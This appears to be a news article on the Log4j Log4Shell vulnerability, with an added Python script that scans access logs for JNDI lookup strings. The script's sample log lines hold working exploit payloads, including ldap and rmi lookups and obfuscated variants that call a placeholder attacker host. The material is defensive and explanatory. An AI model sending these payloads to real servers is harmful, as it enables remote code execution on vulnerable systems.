Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. In this article we have compiled the known payloads, scans, and attacks using the Log4j vulnerability.
Early Friday morning, an exploit was publicly released for a critical zero-day vulnerability dubbed ‘Log4Shell’ in the Apache Log4j Java-based logging platform. This vulnerability allows attackers to remotely execute commands on a vulnerable server simply by submitting a special string, for example in a search query or as their browser’s user agent, that the application then writes to its logs through Log4j.
Soon after, Apache released Log4j 2.15.0 to resolve the vulnerability, but threat actors had already started to scan for and exploit vulnerable servers to exfiltrate data, install malware, or take over the server.
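Because the attack string arrives through ordinary request fields that end up in log files, the quickest check a defender can run is to scan existing web access logs for lookup strings of this shape. The Python below is an added example, not code from the original article: it unwraps the common nested-lookup tricks used to hide the token from naive grep searches and reports each line that still resolves to a JNDI lookup. The access-log lines, the `attacker.example` host, and the IP addresses are all constructed samples.

```python
"""
Detection-side scan for Log4Shell probe strings in web access logs.
Added example, not part of the original article. The sample log lines are
constructed, and the normalisation only covers the widely documented
nesting tricks (case-mapping and default-value lookups), not every variant.
"""
import re
from typing import Iterable, List, Tuple

# Nested lookups used to hide the literal "jndi" token from simple matching:
#   ${lower:J} / ${upper:j}  -> case-mapping of a single character
#   ${foo:-j}  / ${::-j}     -> default-value syntax that yields the literal "j"
_CASE_MAP = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# What remains after normalisation: a jndi: lookup of any scheme (ldap, rmi, dns, ...).
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*[^}]*\}?", re.IGNORECASE)


def normalise(s: str) -> str:
    """Unwrap case-mapping and default-value lookups from the inside out until stable."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_MAP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            s,
        )
        s = _DEFAULT_VALUE.sub(lambda m: m.group(1), s)
    return s


def find_jndi_lookups(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (line_number, normalised_lookup) for every line carrying a jndi lookup."""
    hits: List[Tuple[int, str]] = []
    for n, line in enumerate(lines, start=1):
        m = _JNDI_LOOKUP.search(normalise(line))
        if m:
            hits.append((n, m.group(0)))
    return hits


# Constructed access-log sample: one benign request and three probe variants
# (plain, case-mapped, default-value obfuscated), all using a placeholder host.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [10/Dec/2021:09:14:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:09:14:06 +0000] "GET /?q=${${lower:j}ndi:rmi://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.11 - - [10/Dec/2021:09:15:00 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
]

if __name__ == "__main__":
    for line_no, lookup in find_jndi_lookups(SAMPLE_ACCESS_LOG):
        print(f"line {line_no}: {lookup}")
```

Run against a real access log by replacing `SAMPLE_ACCESS_LOG` with the file's lines; any hit is a probe or exploit attempt that reached the application and is worth correlating with outbound LDAP, RMI or DNS connections from the same host at that time.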
As this software is used in thousands of enterprise applications and websites, there is significant concern that it will lead to widespread attacks and malware deployment.
Below we outline the known attacks currently exploiting the Log4j vulnerability.